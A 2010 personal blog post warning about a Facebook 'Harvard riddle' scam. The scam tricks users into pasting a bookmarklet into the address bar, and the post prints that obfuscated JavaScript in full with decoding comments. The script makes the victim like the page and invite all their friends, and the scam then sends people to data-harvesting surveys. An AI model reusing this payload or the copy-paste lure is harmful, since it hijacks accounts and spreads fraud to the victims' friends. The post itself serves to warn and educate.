About Me

Narendran C R
London, UK
Wednesday, April 28, 2010

Facebook XSS attack - Only 4% of harvard grads can solve this riddle...

Recently I saw that one of my friends "Liked" the page "Only 4% of harvard grads can solve this riddle..." on Facebook. He is one of my good friends, whom I respect a lot, and I know he is not very active in sharing information on Facebook. Obviously I was tempted to visit the page; moreover, I like solving puzzles, and with the title "Only 4% of Harvard grads"!!! no words to explain.


The first page had the question and I started reading... When I reached half of the question, I started thinking of various answers!!! Snow? Air? Storm? Fire?!!! Blah Blah Blah... and when I finished reading the question, the answers in my mind were contradicting each other. Maybe that is why only 4% of Harvard grads could solve this! I thought. Until now I had no second thoughts.

When I moved on to the second page it asked me to press a series of keys. I started feeling suspicious about it. It asked me to press a series of keys: first press and hold the "ctrl" key and then "c". Almost everyone would know that it is the shortcut to copy something, and I knew it would not work for me as I am using an Apple Mac machine. I just followed the instructions...

1. Press ctrl + c (copy something... but what the hell is it copying!!! I did not select anything)
2. Press alt + d (Haaa! this doesn't work on a Mac either. It is the go-to-address-bar command for Windows... I still don't know what is supposed to be copied, but I am now sure it is bogus)
3. Last step, ctrl + v and press enter (Ta da.... Ultimate goal reached..... I am 100% confident it is some sort of attack)

Now I was more curious to know what kind of attack it was. Immediately I switched over to my Windows machine, made sure that I was not logged in, and visited the page "Only 4% of harvard grads can solve this riddle..." As instructed I copied the content, but didn't paste it in the address bar; instead I used TextPad to analyse the content (typical software engineer ;p). I didn't want to spend much time interpreting it as I was in the middle of documenting my dissertation. Thinking smartly (:D I have to say it myself, nobody else will!!) I concluded that the javascript will post a message on your wall saying that you like the page, and your friends can see it and become victims :D. If anyone wants the script, see below.
/************** Javascript ******************************/
javascript:(
function()
{
    // The bookmarklet as copied from the page. It is wrapped in the Dean Edwards
    // "p,a,c,k,e,r" packer, and the string table e[] inside the packed payload
    // is hex-escaped; decoded, e[0..16] are: visibility, style, getElementById,
    // hidden, innerHTML, value, suggest, likeme, MouseEvents, createEvent, click,
    // initEvent, dispatchEvent, select_all, sgm_invite_form,
    // /ajax/social_graph/invite_dialog.php, submitDialog.
    // Element ids in the page's Facebook app (app112010525500764): the payload
    // hides the "mwrapper" block, copies the "jode" value into "jop" and the
    // "ifc" value into "ifo", clicks the "suggest" button, calls fs.select_all(),
    // submits the sgm_invite_form invite dialog, then clicks "likeme".
    a='app112010525500764_jop';
    b='app112010525500764_jode';
    ifc='app112010525500764_ifc';
    ifo='app112010525500764_ifo';
    mw='app112010525500764_mwrapper';
    // The payload string passed to the packer is a single line in the live
    // bookmarklet; it is wrapped here for display only.
    eval(function(p,a,c,k,e,r)
        {
            // word index c is spelled 0-9a-z for c<=35 and A-Z for 36..61
            e=function(c)
            {
                return(c>35?String.fromCharCode(c+29):c.toString(36))
            };
            if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);
            k=[function(e){return r[e]}];
            e=function(){return'\\w+'};
            c=1};
            // put the dictionary words back, highest index first, then the
            // caller eval()s the result
            while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
            return p
        }
    ('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];
    d=U;
    d[e[2]](V)[e[1]][e[0]]=e[3];
    d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
    s=d[e[2]](e[6]);
    m=d[e[2]](e[7]);
    c=d[e[9]](e[8]);
    c[e[11]](e[10],I,I);
    s[e[12]](c);
    C(D(){W[e[13]]()},E);
    C(D(){X[e[16]](e[14],e[15])},E);
    C(D(){m[e[12]](c);
    d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);
    ',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B| true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))
}
)();
************************end of script**********************************

Wait... the attack is still not complete. The goal of this attack is not just getting visitors to the page. It still has not revealed the answer!!! In fact there is no answer to the question. It will ask you to take a survey and redirect you to different survey pages like "prizes .uk .com" and "rewardstoday .co .uk" (spaces left in intentionally so that you don't become a victim :p), where you will be asked for information like your email address, name, phone number etc., and even your credit card number :D.

Anyway, there is no answer to the question, so you don't have to worry about it...

There are already about 87,223 victims, and we don't really know how many of them gave out their personal information or credit card details!!! Each time I hit refresh it increases by at least 50!!! I realized the potential of social media...

Now, why did I write this post? Hoping that it might educate some people who are really innocent and might become victims.

What can we do? Visit the page "Only 4% of harvard grads can solve this riddle...", scroll to the bottom and report the page, so that we help get these pages taken down.

Thank you very much for taking your time...
